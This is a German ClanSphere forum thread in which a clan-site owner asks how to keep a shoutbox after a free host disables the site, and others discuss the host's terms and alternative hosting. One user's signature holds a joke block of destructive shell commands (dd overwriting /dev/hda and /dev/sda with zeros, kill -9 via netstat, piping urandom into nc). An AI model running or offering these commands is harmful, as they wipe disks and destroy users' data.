Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 16
Seite [1]
Xx|R@n3|xX


Wannabe poster




Beiträge: 27
# Thema - 18.01.2011 um 07:08 Uhr
hallo,
ich weiß nicht ob ich hier richtig bin, aber ich habe ein problem.
das problem ist mein freehoster. und zwar hat er mir gestern die page lahmgelegt mit der begründung
das es nicht gestattet sei laut agb´s eine chatsoftware zu nutzen.chatsoftware in diesem fall die shoutbox.
meine frage hierzu ist ob es möglich ist einen anderen ftp zugang für die shoutbox zu nutzen? also einen andern webspace anbieter.
ist irgendwie möglich die shout von einem anderen anbieter weiterleiten zu lassen?

page läuft jetz wieder unter der vorrausetztung das ich die shoutbox rausnehme!

vorab schonmal danke!
Inaktiv
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 1 - 18.01.2011 um 09:18 Uhr
Die Clansphere-Shoutbox auf einen anderen Webspace zu verlegen ist nicht möglich.
Was mir dazu nur einfällt ist, dass es auch gratis Shoutbox-Anbieter gibt, bei denen du dich anmelden kannst und deine eigene Shoutbox "entwerfen" kannst (Farben einstellen und so) und dann einen HTML-Code bekommst, den du in den Template einfügen kannst.


------------------
www.laszlokorte.de

Inaktiv
|
SlayR ClanSphere Team


Geekboy




Herkunft: Calbe (Saale)
Beiträge: 1133
# Antwort: 2 - 18.01.2011 um 09:39 Uhr
Mir fällt da ein: Anbieter wechseln. Die shoutbox als Chat zu bezeichnen ist in meinen Augen lächerlich!


------------------
--- CLANSPHERE ---
Professional clan care starts here


Inaktiv
|
Xx|R@n3|xX
Thread-Ersteller


Wannabe poster




Beiträge: 27
# Antwort: 3 - 18.01.2011 um 11:55 Uhr
natürlich ist das lächerlich! sie sagten die shout würde, auf die menge an usern gesehn, zuviel traffic erzeugen! bin fast gestorben wie ich das gelesen hab........
hab mir aber schon was überlegt. und zwar werde ich eine externe shoutbox über einen anderen webspace zugang installieren! muss nur noch ne shoutbox finden^^

UPS.....hatte Schiri ganz überlesen......


Inaktiv
|
bFeeee


Just nerd



Herkunft: Hamm
Beiträge: 944
# Antwort: 4 - 18.01.2011 um 12:07 Uhr
bei welchem anbieter war das problem denn ?


------------------
Grüße bFeee

Inaktiv
|
Xx|R@n3|xX
Thread-Ersteller


Wannabe poster




Beiträge: 27
# Antwort: 5 - 18.01.2011 um 12:13 Uhr
bplaced! egal......

das is meine seite:http://www.battle-against-noobs.de

wie kriege ich das iframe: <!-- BEGIN MyShoutbox.com CODE -->
<iframe src="http://615758.myshoutbox.com/" width="152" height="300" frameborder="0" allowTransparency="true"></iframe>
<!-- END MyShoutbox.com CODE--

...so eingebunden das die shoutbox unter dem button |BAN|warserver links auf der page auftaucht?


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 6 - 18.01.2011 um 12:28 Uhr
Weiters sind Webseiten, deren einziger Sinn in der Weiterleitung zu anderen Seiten besteht, untersagt. So genannte „Browsergames“ bzw. entsprechende Tools, Proxy-Dienste, Toplisten, Bilderhosting Dienste („Imagehosting&#8220, Bots, Webhosting-Dienste, Filesharing-Software sowie Torrents sind aufgrund zu hoher serverseitiger Belastung nicht gestattet, dies umfasst weiters auch Chatsoftware, sog. „Shoutboxes“, oder andere Software, die kontinuierlich Datensätze von einem bplaced-Server anfordert,


Ist nur ein kleiner Auszug aus deren AGBs.
In diesem Fall e verstößt die SB wirklich gegen deren Richtlinien.
Warum die eine SB in dieser Form nicht wünschen kann man natürlich verstehen wie man möchte.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 7 - 18.01.2011 um 12:31 Uhr
Ich würde auch sofort den Anbieter wechseln. Das hab ich ja noch nie gehört. Wenn der ein Trafficproblem hat, dann soll er sich dann melden, wenn du deinen gekauften Traffic überschritten hats, vorher nicht. In meinen Augen ist eine Shoutbox nichts anderes als ein Forum nur ohne die Limitierung beim wiederholten posten und mit einer LIve-Aktualisierung.
Ausserdem hast du nur 30 Mitglieder auf deiner Seite, was soll da an Traffic zusammenkommen? Da müssten alle Member den ganzen Tag Bilder und sowas in die Shoutbox posten...

EDIT:
Weiters sind Webseiten, deren einziger Sinn in der Weiterleitung zu anderen Seiten besteht, untersagt. So genannte „Browsergames“ bzw. entsprechende Tools, Proxy-Dienste, Toplisten, Bilderhosting Dienste („Imagehosting&#8220, Bots, Webhosting-Dienste, Filesharing-Software sowie Torrents sind aufgrund zu hoher serverseitiger Belastung nicht gestattet, dies umfasst weiters auch Chatsoftware, sog. „Shoutboxes“, oder andere Software, die kontinuierlich Datensätze von einem bplaced-Server anfordert,


Ist damit aber dann nicht auch eine extern eingebundenen Shoutbox gemeint?


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Zuletzt editiert von eumelchen am 18.01.2011 um 12:34 Uhr (2x Editiert)
Inaktiv
|
Xx|R@n3|xX
Thread-Ersteller


Wannabe poster




Beiträge: 27
# Antwort: 8 - 18.01.2011 um 12:36 Uhr
ich denke die beziehen sich da auf die anzahl an page die geupt wurden. wenn es übertrieben gesprochen 1000000 pages wären und jede ein von allen usern genutzte shout hätte...........troztdem, sie hätten mich ruhig kurz warnen können anstatt direkt alles off zu setzen!

ja leck mich am a....! ok, wer hat den einen anstandigen freehoster im schublädchen? aber bitte mit de domain weiterleitung.....

sonst lasse ich die shout raus. is zwar ma voll assi aber was will man machen!


Zuletzt editiert von Xx|R@n3|xX am 18.01.2011 um 12:39 Uhr (2x Editiert)
Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 9 - 18.01.2011 um 12:43 Uhr
Voll krass der Laden. Die bieten 4 GB Webspace an ohne Traffic Limit, aber man darf keine Shoutbox haben^^. Wer bitte braucht 4 GB für ne Website?

Ich könnte dich an einen Hoster vermitteln, inklusive .de Domain und TS3-Server. Der setzt dir auch nen Gameserver auf. Ist ein Freund von mir, der das nebenbei macht. Alles legal und eingetragen. Wir haben dort auch unsere Page und das TS liegen. Ist dort alles etwas einfacher mit de Support da es ein kleiner Hoster ist. Server sind alle in Deutschland.
Wenn du willst sage ich ihm Bescheid dann kannste dich mal bei ihm melden.


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Inaktiv
|
Xx|R@n3|xX
Thread-Ersteller


Wannabe poster




Beiträge: 27
# Antwort: 10 - 18.01.2011 um 12:45 Uhr
hängt an eventuell enstehenden kosten! ne domain hab ich, ts3 und server auch! wäre lediglich webspace der fehlt!

wer wäre das denn?


Zuletzt editiert von Xx|R@n3|xX am 18.01.2011 um 12:46 Uhr (1x Editiert)
Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 11 - 18.01.2011 um 12:58 Uhr
der laden heisst selfcreators.net Allerdings ist die website derzeit im umbau. Siehst du also nichts drauf.
Hast aber ne PN


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Zuletzt editiert von eumelchen am 18.01.2011 um 12:58 Uhr (1x Editiert)
Inaktiv
|
Xx|R@n3|xX
Thread-Ersteller


Wannabe poster




Beiträge: 27
# Antwort: 12 - 18.01.2011 um 13:13 Uhr
kk, thx


Inaktiv
|
Tress13


Highlander




Herkunft: Lüdenscheid
Beiträge: 3048
# Antwort: 13 - 18.01.2011 um 18:27 Uhr
Free-Hoster zwar nicht, aber für 20,- pro Jahr kannste nach SamCity gehen.
Oder frag mal Freezeman !



------------------


www.iv-gaming.de | www.iv-artwork.de

Inaktiv
|
Jam2 ClanSphere Team


Highlander





Beiträge: 3291
# Antwort: 14 - 18.01.2011 um 18:32 Uhr
dies umfasst weiters auch Chatsoftware, sog. „Shoutboxes“, oder andere Software, die kontinuierlich Datensätze von einem bplaced-Server anfordert,

Die CSP Shoutbox fordert nicht kontinuierlich Datensätze an, sondern nur beim Seitenaufruf einmal und diese wird nur bei einer Ajax Navlist aktualisierung kontinuierlich abgefragt. (wie auch andere Navlisten in CSP, wenn eingestellt)



Ist damit aber dann nicht auch eine extern eingebundenen Shoutbox gemeint?

m.E. nicht, da das Script nicht auf den Datenbankserver von dem Hoster zugreift.


------------------
Gruß/ Best regards
Jam2

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
Xx|R@n3|xX
Thread-Ersteller


Wannabe poster




Beiträge: 27
# Antwort: 15 - 19.01.2011 um 07:52 Uhr
nein, hab mit dem freehoster nochmal gesprochen und er sagte wenn ich eine externe über ein frame einbinde und sie somit nich über deren webspace läuft wäre das ok!!! hat sich aber ohne hin erledigt dank eumelchen!


Zuletzt editiert von Xx|R@n3|xX am 19.01.2011 um 07:53 Uhr (1x Editiert)
Inaktiv
|
LoNE|Hitman


King for a day





Beiträge: 376
# Antwort: 16 - 19.01.2011 um 11:09 Uhr
^^ freut mich wenn ich helfen konnte.


------------------
"Wer glaubt ein Licht am Ende des Tunnels zu sehen, sollte sich Gedanken machen, ob es nicht ein Zug ist, der einem entgegen kommt!"



System Info:
Clansphere Version: 2011.4.3
CS Website: http://www.lone-clan.de/
Browser: Firefox 27.0 / IE 9 / Safari 5 / Opera 11.11 / Google Chrome 7
OS: Windows 7 Home Premium x64


Inaktiv
|

Dieses Thema wurde von TeQu!La ClanSphere Team PM geschlossen.

Antworten: 16
Seite [1]